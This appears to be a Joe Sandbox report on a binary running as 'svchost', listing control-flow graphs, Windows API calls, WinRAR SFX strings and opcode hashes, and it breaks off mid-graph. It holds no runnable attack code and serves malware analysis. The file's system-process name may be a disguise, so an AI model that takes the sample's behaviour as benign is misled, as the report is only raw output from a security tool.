                                      control_flow_graph 1938 7ff669aae3d0-7ff669aae414 1939 7ff669aae423-7ff669aae43a call 7ff669aa3cac 1938->1939 1940 7ff669aae416-7ff669aae41e call 7ff669aa3cac 1938->1940 1946 7ff669aae46c-7ff669aae48b 1939->1946 1947 7ff669aae43c-7ff669aae456 call 7ff669ab573c call 7ff669ab65c0 1939->1947 1945 7ff669aae9d4-7ff669aae9fa call 7ff669ad1d90 1940->1945 1949 7ff669aae490-7ff669aae4ae call 7ff669aa8a94 1946->1949 1950 7ff669aae48d 1946->1950 1947->1946 1960 7ff669aae458-7ff669aae462 call 7ff669ab63f4 1947->1960 1958 7ff669aae4b0 1949->1958 1959 7ff669aae4b3-7ff669aae4c0 1949->1959 1950->1949 1958->1959 1961 7ff669aae4c6-7ff669aae4ca 1959->1961 1962 7ff669aae8ab-7ff669aae8b2 1959->1962 1960->1946 1972 7ff669aae464-7ff669aae467 call 7ff669ab4e2c 1960->1972 1961->1962 1966 7ff669aae4d0-7ff669aae4dc call 7ff669ab63f4 1961->1966 1964 7ff669aae8b4 1962->1964 1965 7ff669aae8c9 1962->1965 1969 7ff669aae8b9-7ff669aae8c1 1964->1969 1970 7ff669aae8cc-7ff669aae8e5 call 7ff669ab70b0 1965->1970 1966->1962 1976 7ff669aae4e2-7ff669aae51a call 7ff669ac0acc 1966->1976 1973 7ff669aae961-7ff669aae964 1969->1973 1974 7ff669aae8c7 1969->1974 1985 7ff669aae953-7ff669aae95c call 7ff669aa1fa8 1970->1985 1986 7ff669aae8e7-7ff669aae8ef 1970->1986 1972->1946 1978 7ff669aae986-7ff669aae991 1973->1978 1979 7ff669aae966-7ff669aae981 call 7ff669aa2044 1973->1979 1974->1970 2000 7ff669aae520-7ff669aae537 call 7ff669ab65c0 1976->2000 2001 7ff669aae723-7ff669aae738 1976->2001 1983 7ff669aae9a0-7ff669aae9a3 1978->1983 1984 7ff669aae993-7ff669aae99b call 7ff669ab67ac 1978->1984 1979->1978 1983->1945 1987 7ff669aae9a5-7ff669aae9b8 1983->1987 1984->1983 1985->1973 1992 7ff669aae8f1-7ff669aae904 1986->1992 1993 7ff669aae924-7ff669aae94f call 7ff669ae50d0 1986->1993 1997 7ff669aae9cf call 7ff669ad1c7c 1987->1997 1998 7ff669aae9ba-7ff669aae9cd 1987->1998 1995 7ff669aae91f call 7ff669ad1c7c 1992->1995 1996 7ff669aae906-7ff669aae919 1992->1996 1993->1985 1995->1993 1996->1995 2003 7ff669aaea2b-7ff669aaea8b call 7ff669ad6854 call 7ff669ad1ec0 call 7ff669aa33a8 1996->2003 1997->1945 1998->1997 2005 7ff669aae9fb-7ff669aaea00 call 7ff669ad6854 1998->2005 2018 7ff669aae71e 2000->2018 2019 7ff669aae53d-7ff669aae541 2000->2019 2009 7ff669aae73e-7ff669aae74f 2001->2009 2010 7ff669aae8a6-7ff669aae8a9 2001->2010 2048 7ff669aaea96-7ff669aaeaa1 call 7ff669ab2058 2003->2048 2049 7ff669aaea8d-7ff669aaea94 2003->2049 2025 7ff669aaea01-7ff669aaea06 call 7ff669ad6854 2005->2025 2009->2010 2014 7ff669aae755-7ff669aae76d 2009->2014 2010->1969 2015 7ff669aaea1f-7ff669aaea24 call 7ff669aa6ddc 2014->2015 2016 7ff669aae773-7ff669aae7e0 call 7ff669aa12c0 call 7ff669aad5bc 2014->2016 2035 7ff669aaea25-7ff669aaea2a call 7ff669ad6854 2015->2035 2044 7ff669aae80e-7ff669aae81f call 7ff669aa1fa8 2016->2044 2045 7ff669aae7e2-7ff669aae809 call 7ff669aa1fa8 call 7ff669ae50d0 2016->2045 2018->2001 2019->2018 2023 7ff669aae547-7ff669aae54b 2019->2023 2023->2018 2027 7ff669aae551-7ff669aae569 2023->2027 2033 7ff669aaea07-7ff669aaea0c call 7ff669aa6ddc 2025->2033 2032 7ff669aae56f-7ff669aae60b call 7ff669aa12c0 * 2 call 7ff669aa11ec call 7ff669aad5bc 2027->2032 2027->2033 2088 7ff669aae677-7ff669aae692 call 7ff669aa1fa8 * 2 2032->2088 2089 7ff669aae60d-7ff669aae614 2032->2089 2050 7ff669aaea0d-7ff669aaea12 call 7ff669ad6854 2033->2050 2035->2003 2065 7ff669aae821-7ff669aae834 2044->2065 2066 7ff669aae854-7ff669aae86e 2044->2066 2045->2044 2061 7ff669aaeaa6-7ff669aaeaa8 2048->2061 2054 7ff669aaeaae-7ff669aaeab4 call 7ff669aa3ef4 2049->2054 2070 7ff669aaea13-7ff669aaea18 call 7ff669ad6854 2050->2070 2071 7ff669aaeab9-7ff669aaeabb 2054->2071 2061->2054 2069 7ff669aaecdf-7ff669aaece3 call 7ff669aa36e0 2061->2069 2073 7ff669aae84f call 7ff669ad1c7c 2065->2073 2074 7ff669aae836-7ff669aae849 2065->2074 2066->1964 2068 7ff669aae870-7ff669aae882 2066->2068 2077 7ff669aae714-7ff669aae719 call 7ff669ad1c7c 2068->2077 2078 7ff669aae888-7ff669aae89b 2068->2078 2087 7ff669aaece8-7ff669aaed15 call 7ff669ad1d90 2069->2087 2090 7ff669aaea19-7ff669aaea1e call 7ff669ad6854 2070->2090 2071->2069 2080 7ff669aaeac1-7ff669aaeac8 2071->2080 2073->2066 2074->2035 2074->2073 2077->1964 2078->2025 2083 7ff669aae8a1 2078->2083 2080->2069 2085 7ff669aaeace-7ff669aaead2 call 7ff669aa45c4 2080->2085 2083->2077 2097 7ff669aaead7-7ff669aaeae7 2085->2097 2118 7ff669aae694-7ff669aae6a7 2088->2118 2119 7ff669aae6c7-7ff669aae6e1 2088->2119 2094 7ff669aae616-7ff669aae624 2089->2094 2095 7ff669aae647-7ff669aae672 call 7ff669ae50d0 2089->2095 2090->2015 2100 7ff669aae642 call 7ff669ad1c7c 2094->2100 2101 7ff669aae626-7ff669aae639 2094->2101 2095->2088 2104 7ff669aaec82-7ff669aaec89 call 7ff669aaed24 2097->2104 2105 7ff669aaeaed-7ff669aaeb69 call 7ff669aa8a94 call 7ff669ab6be4 call 7ff669ab3244 2097->2105 2100->2095 2101->2070 2108 7ff669aae63f 2101->2108 2115 7ff669aaec8e-7ff669aaec9d 2104->2115 2134 7ff669aaebf9-7ff669aaebfb 2105->2134 2108->2100 2116 7ff669aaec9f 2115->2116 2117 7ff669aaeca2-7ff669aaeca6 2115->2117 2116->2117 2121 7ff669aaecbe-7ff669aaecd6 call 7ff669aa6754 call 7ff669aaedf8 2117->2121 2122 7ff669aaeca8-7ff669aaecb9 call 7ff669abff98 2117->2122 2123 7ff669aae6c2 call 7ff669ad1c7c 2118->2123 2124 7ff669aae6a9-7ff669aae6bc 2118->2124 2119->1964 2125 7ff669aae6e7-7ff669aae6f9 2119->2125 2138 7ff669aaecdb-7ff669aaecdd 2121->2138 2122->2121 2123->2119 2124->2050 2124->2123 2125->2077 2131 7ff669aae6fb-7ff669aae70e 2125->2131 2131->2077 2131->2090 2136 7ff669aaec01-7ff669aaec09 2134->2136 2137 7ff669aaeb6e-7ff669aaeb7b 2134->2137 2139 7ff669aaec3e-7ff669aaec4d 2136->2139 2140 7ff669aaec0b-7ff669aaec1e 2136->2140 2141 7ff669aaebb0-7ff669aaebef call 7ff669ab6be4 2137->2141 2142 7ff669aaeb7d-7ff669aaeb90 2137->2142 2138->2069 2138->2121 2139->2104 2145 7ff669aaec4f-7ff669aaec62 2139->2145 2143 7ff669aaec20-7ff669aaec33 2140->2143 2144 7ff669aaec39 call 7ff669ad1c7c 2140->2144 2141->2134 2155 7ff669aaebf4 call 7ff669ab3244 2141->2155 2146 7ff669aaeb92-7ff669aaeba5 2142->2146 2147 7ff669aaebab call 7ff669ad1c7c 2142->2147 2143->2144 2149 7ff669aaed1c-7ff669aaed23 call 7ff669ad6854 2143->2149 2144->2139 2151 7ff669aaec64-7ff669aaec77 2145->2151 2152 7ff669aaec7d call 7ff669ad1c7c 2145->2152 2146->2147 2146->2149 2147->2141 2151->2152 2156 7ff669aaed16-7ff669aaed1b call 7ff669ad6854 2151->2156 2152->2104 2155->2134 2156->2149
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \
                                      • API String ID: 0-2967466578
                                      • Opcode ID: 4d609d334797011dc6cd8311e4f56762f9d6096ae8a39f9c464939cf813380c9
                                      • Instruction ID: ee6e7c830f44b4dccd3a660cf34592f154ccc2abc476f275817ba9ab46ec2d53
                                      • Opcode Fuzzy Hash: 4d609d334797011dc6cd8311e4f56762f9d6096ae8a39f9c464939cf813380c9
                                      • Instruction Fuzzy Hash: 3042B062B08B82C6EA10DF65E4441BD73B1EB857A4F505232EE5C5BAEADF7CE585C300
                                      Function 00007FF669AC9D24 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 270COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2277 7ff669ac9d24-7ff669ac9d66 2278 7ff669ac9fe0-7ff669aca00d call 7ff669ad1d90 2277->2278 2279 7ff669ac9d6c-7ff669ac9e63 call 7ff669acc924 call 7ff669ad68cc call 7ff669aa12c0 call 7ff669ad68cc call 7ff669aa12c0 call 7ff669ad68cc call 7ff669aa12c0 call 7ff669aca134 2277->2279 2297 7ff669ac9e68-7ff669ac9e6a 2279->2297 2298 7ff669ac9e72 2297->2298 2299 7ff669ac9e6c-7ff669ac9e70 2297->2299 2300 7ff669ac9e75-7ff669ac9e81 2298->2300 2299->2298 2299->2300 2301 7ff669ac9e83-7ff669ac9e95 2300->2301 2302 7ff669ac9ebd-7ff669ac9ece 2300->2302 2303 7ff669ac9eb0-7ff669ac9eb5 call 7ff669ad1c7c 2301->2303 2304 7ff669ac9e97-7ff669ac9eaa 2301->2304 2305 7ff669ac9ed0-7ff669ac9ee2 2302->2305 2306 7ff669ac9f0a-7ff669ac9f1b 2302->2306 2303->2302 2304->2303 2309 7ff669aca014-7ff669aca019 call 7ff669ad6854 2304->2309 2311 7ff669ac9ee4-7ff669ac9ef7 2305->2311 2312 7ff669ac9efd-7ff669ac9f02 call 7ff669ad1c7c 2305->2312 2307 7ff669ac9f4f-7ff669ac9f52 2306->2307 2308 7ff669ac9f1d-7ff669ac9f2f 2306->2308 2315 7ff669ac9f54-7ff669ac9f60 call 7ff669aa3cac 2307->2315 2316 7ff669ac9f61-7ff669ac9f68 2307->2316 2313 7ff669ac9f31-7ff669ac9f44 2308->2313 2314 7ff669ac9f4a call 7ff669ad1c7c 2308->2314 2319 7ff669aca01a-7ff669aca01f call 7ff669ad6854 2309->2319 2311->2312 2311->2319 2312->2306 2313->2314 2322 7ff669aca020-7ff669aca025 call 7ff669ad6854 2313->2322 2314->2307 2315->2316 2325 7ff669ac9f6a-7ff669ac9f7c 2316->2325 2326 7ff669ac9f9c-7ff669ac9fb0 2316->2326 2319->2322 2338 7ff669aca026-7ff669aca081 call 7ff669ad6854 call 7ff669aa26c8 2322->2338 2332 7ff669ac9f7e-7ff669ac9f91 2325->2332 2333 7ff669ac9f97 call 7ff669ad1c7c 2325->2333 2326->2278 2329 7ff669ac9fb2-7ff669ac9fc4 2326->2329 2335 7ff669ac9fdb call 7ff669ad1c7c 2329->2335 2336 7ff669ac9fc6-7ff669ac9fd9 2329->2336 2332->2333 2332->2338 2333->2326 2335->2278 2336->2335 2340 7ff669aca00e-7ff669aca013 call 7ff669ad6854 2336->2340 2348 7ff669aca083-7ff669aca088 2338->2348 2349 7ff669aca08d-7ff669aca093 2338->2349 2340->2309 2350 7ff669aca118-7ff669aca133 call 7ff669ad1d90 2348->2350 2351 7ff669aca102-7ff669aca10d SetDlgItemTextW 2349->2351 2352 7ff669aca095-7ff669aca098 2349->2352 2353 7ff669aca113 2351->2353 2355 7ff669aca0a5-7ff669aca0a7 2352->2355 2356 7ff669aca09a-7ff669aca09f 2352->2356 2353->2350 2355->2350 2358 7ff669aca0a1-7ff669aca0a3 2356->2358 2359 7ff669aca0b6-7ff669aca100 call 7ff669b0e178 call 7ff669abb444 call 7ff669abb4b4 EndDialog 2356->2359 2358->2355 2361 7ff669aca0a9-7ff669aca0b4 EndDialog 2358->2361 2359->2350 2361->2353
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Dialog$CloseConcurrency::cancel_current_taskItemOpenText
                                      • String ID: GETPASSWORD1$Software\WinRAR SFX
                                      • API String ID: 2036574139-1315819833
                                      • Opcode ID: ce9535df625cb818cf6f561ea6461aa7de3d19bdf8f7d60cadf61c6e5d574941
                                      • Instruction ID: 155b66f543e1a58d806277110c6b7a9506d5ab950e33ece4e8d17d425eeae728
                                      • Opcode Fuzzy Hash: ce9535df625cb818cf6f561ea6461aa7de3d19bdf8f7d60cadf61c6e5d574941
                                      • Instruction Fuzzy Hash: 83C18E62F19B82C6EB00CF74D4852BD33B2AB857A8F005231DE5D6E79ADE38E549C344
                                      Function 00007FF669AAEDF8 Relevance: 17.1, APIs: 8, Strings: 1, Instructions: 1386COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: __tmp_reference_source_
                                      • API String ID: 3668304517-685763994
                                      • Opcode ID: f33f3b11d562c22e2209c7bdf06c98319fa5e61671820c2abe75737d61782696
                                      • Instruction ID: bf4eece2e13f62eb7c517a1b2f225f5b9246b76ca2d35ff5096a8201ea348ed6
                                      • Opcode Fuzzy Hash: f33f3b11d562c22e2209c7bdf06c98319fa5e61671820c2abe75737d61782696
                                      • Instruction Fuzzy Hash: E9D28B62A086C6C6EA64CF25E1543BE77F1EB85784F404136DE9D8B6AADF7CE484C700
                                      Function 00007FF669AB341C Relevance: 10.6, APIs: 7, Instructions: 150fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                      • String ID:
                                      • API String ID: 474548282-0
                                      • Opcode ID: add9c535fcd1950245e6fdf19927f21eb7d0f95099c43ef1d4d4b7bb08033897
                                      • Instruction ID: d3dc41c8a84e4bf4e9f0658ff37f3b30dd9d9a459541012a23ad1e11f7d7cf88
                                      • Opcode Fuzzy Hash: add9c535fcd1950245e6fdf19927f21eb7d0f95099c43ef1d4d4b7bb08033897
                                      • Instruction Fuzzy Hash: 40519D62A09A86C6EA109F28E44127D73B1FB857A4F505331EEBD8A6D9DF3CE584C700
                                      Function 00007FF669AB1890 Relevance: 9.2, APIs: 6, Instructions: 163filetimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3029 7ff669ab1890-7ff669ab18cb 3030 7ff669ab18d6 3029->3030 3031 7ff669ab18cd-7ff669ab18d4 3029->3031 3032 7ff669ab18d9-7ff669ab194b 3030->3032 3031->3030 3031->3032 3033 7ff669ab1950-7ff669ab197b CreateFileW 3032->3033 3034 7ff669ab194d 3032->3034 3035 7ff669ab1981-7ff669ab19b3 GetLastError call 7ff669ab5d18 3033->3035 3036 7ff669ab1a5d-7ff669ab1a61 3033->3036 3034->3033 3042 7ff669ab1a01 3035->3042 3043 7ff669ab19b5-7ff669ab19ff CreateFileW GetLastError 3035->3043 3037 7ff669ab1a67-7ff669ab1a6b 3036->3037 3040 7ff669ab1a79-7ff669ab1a7d 3037->3040 3041 7ff669ab1a6d-7ff669ab1a70 3037->3041 3045 7ff669ab1a7f-7ff669ab1a83 3040->3045 3046 7ff669ab1aa3-7ff669ab1ab7 3040->3046 3041->3040 3044 7ff669ab1a72 3041->3044 3049 7ff669ab1a07-7ff669ab1a0f 3042->3049 3043->3049 3044->3040 3045->3046 3050 7ff669ab1a85-7ff669ab1a9d SetFileTime 3045->3050 3047 7ff669ab1ab9-7ff669ab1ac9 call 7ff669aa3cac 3046->3047 3048 7ff669ab1acd-7ff669ab1af6 call 7ff669ad1d90 3046->3048 3047->3048 3052 7ff669ab1a11-7ff669ab1a28 3049->3052 3053 7ff669ab1a48-7ff669ab1a5b 3049->3053 3050->3046 3056 7ff669ab1a43 call 7ff669ad1c7c 3052->3056 3057 7ff669ab1a2a-7ff669ab1a3d 3052->3057 3053->3037 3056->3053 3057->3056 3059 7ff669ab1af7-7ff669ab1aff call 7ff669ad6854 3057->3059
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3536497005-0
                                      • Opcode ID: cf4cb9844ba2689985b4c0fb221ba14bdc6572bfc4fdd0263b288aa5301d0f13
                                      • Instruction ID: fa834eaa722d1a92a97f800d2b89033f5b8f6b4506838156c7121468a1ce19f8
                                      • Opcode Fuzzy Hash: cf4cb9844ba2689985b4c0fb221ba14bdc6572bfc4fdd0263b288aa5301d0f13
                                      • Instruction Fuzzy Hash: 1F61D166E1878185E7208F29E40037E77F1FB857A8F101329DEA94BAD9DF3DD5948740
                                      Function 00007FF669AA5B70 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 615COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: CMT
                                      • API String ID: 3668304517-2756464174
                                      • Opcode ID: 4dae98603705b2e05ebd5705bf8a6d0eaefde81177943c0740de6c7f50eb1749
                                      • Instruction ID: a79d0eb5f7060a9894341608d87ada1040850af9eec80f218470c36c36aaf027
                                      • Opcode Fuzzy Hash: 4dae98603705b2e05ebd5705bf8a6d0eaefde81177943c0740de6c7f50eb1749
                                      • Instruction Fuzzy Hash: 9C427662B086829BEB289F78C1502FD77F1EB51348F400136DF1E9BA96DF78A558CB00
                                      Function 00007FF669AA5300 Relevance: 3.8, APIs: 2, Instructions: 761COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 4d2fc60303526d1a9509bf2dff79ab5e03f0a21f60de4acd2949a1b312f8efb9
                                      • Instruction ID: 51f3709fb1b7edb459e3579728519509e0ebfce4dd473b28b35562caf5f338f6
                                      • Opcode Fuzzy Hash: 4d2fc60303526d1a9509bf2dff79ab5e03f0a21f60de4acd2949a1b312f8efb9
                                      • Instruction Fuzzy Hash: B7629622B08686DBFA28AE66D5543FD33F1AB45788F441432DE4EDBB96DE7CE4448304
                                      Function 00007FF669AB4620 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1017591355-0
                                      • Opcode ID: f0fab94e89f8dfe17744a802f3d8cdb2a92c95cad9f6bc32b347d0c21958dadd
                                      • Instruction ID: 7b5cd1ce68dcaec0c06f9905d00169bf6df631fe30b540e5b44521ba4c11659f
                                      • Opcode Fuzzy Hash: f0fab94e89f8dfe17744a802f3d8cdb2a92c95cad9f6bc32b347d0c21958dadd
                                      • Instruction Fuzzy Hash: 2361F552E1C68FC1FAA49E66841527A72F1AF85BD4F144131EE4D8FBDEEE7CE4808200
                                      Function 00007FF669AB8B10 Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 700COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                      • API String ID: 3629253777-3268106645
                                      • Opcode ID: 3e049898a92d82d0d579073836632aed0c898a3fd36fc283c44cccd5c02f0299
                                      • Instruction ID: ffb9cdaafcb189fc4e8ef8702d4af02d864e5ee9fb98c3ec3245d0c7c9b04fc8
                                      • Opcode Fuzzy Hash: 3e049898a92d82d0d579073836632aed0c898a3fd36fc283c44cccd5c02f0299
                                      • Instruction Fuzzy Hash: AB62AC62A19A8AC1EB10DF28C5582BD33B5FB91788F814132DE5D8B6D9EF3CE945C340
                                      Function 00007FF669ACED48 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 282COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2162 7ff669aced48-7ff669aced8b 2163 7ff669aced91-7ff669acedcd call 7ff669ae5770 2162->2163 2164 7ff669acf0f6-7ff669acf11b call 7ff669aa1fa8 call 7ff669ad1d90 2162->2164 2169 7ff669acedd2-7ff669acedd9 2163->2169 2170 7ff669acedcf 2163->2170 2172 7ff669acedea-7ff669acedee 2169->2172 2173 7ff669aceddb-7ff669aceddf 2169->2173 2170->2169 2175 7ff669acedf3-7ff669acedfe 2172->2175 2176 7ff669acedf0 2172->2176 2177 7ff669acede4-7ff669acede8 2173->2177 2178 7ff669acede1 2173->2178 2179 7ff669acee04 2175->2179 2180 7ff669acee8f 2175->2180 2176->2175 2177->2175 2178->2177 2181 7ff669acee0a-7ff669acee11 2179->2181 2182 7ff669acee93-7ff669acee96 2180->2182 2183 7ff669acee13 2181->2183 2184 7ff669acee16-7ff669acee1b 2181->2184 2185 7ff669acee9e-7ff669aceea1 2182->2185 2186 7ff669acee98-7ff669acee9c 2182->2186 2183->2184 2187 7ff669acee4f-7ff669acee5a 2184->2187 2188 7ff669acee1d 2184->2188 2189 7ff669aceec7-7ff669aceeda call 7ff669ab56b0 2185->2189 2190 7ff669aceea3-7ff669aceeaa 2185->2190 2186->2185 2186->2189 2191 7ff669acee5f-7ff669acee64 2187->2191 2192 7ff669acee5c 2187->2192 2193 7ff669acee32-7ff669acee39 2188->2193 2201 7ff669aceeff-7ff669acef5a call 7ff669ad68cc call 7ff669aa12c0 call 7ff669ab266c call 7ff669aa1fa8 2189->2201 2202 7ff669aceedc-7ff669aceefa call 7ff669ac0ad8 2189->2202 2190->2189 2194 7ff669aceeac-7ff669aceec3 2190->2194 2196 7ff669acee6a-7ff669acee71 2191->2196 2197 7ff669acf11c-7ff669acf123 2191->2197 2192->2191 2198 7ff669acee1f-7ff669acee26 2193->2198 2199 7ff669acee3b 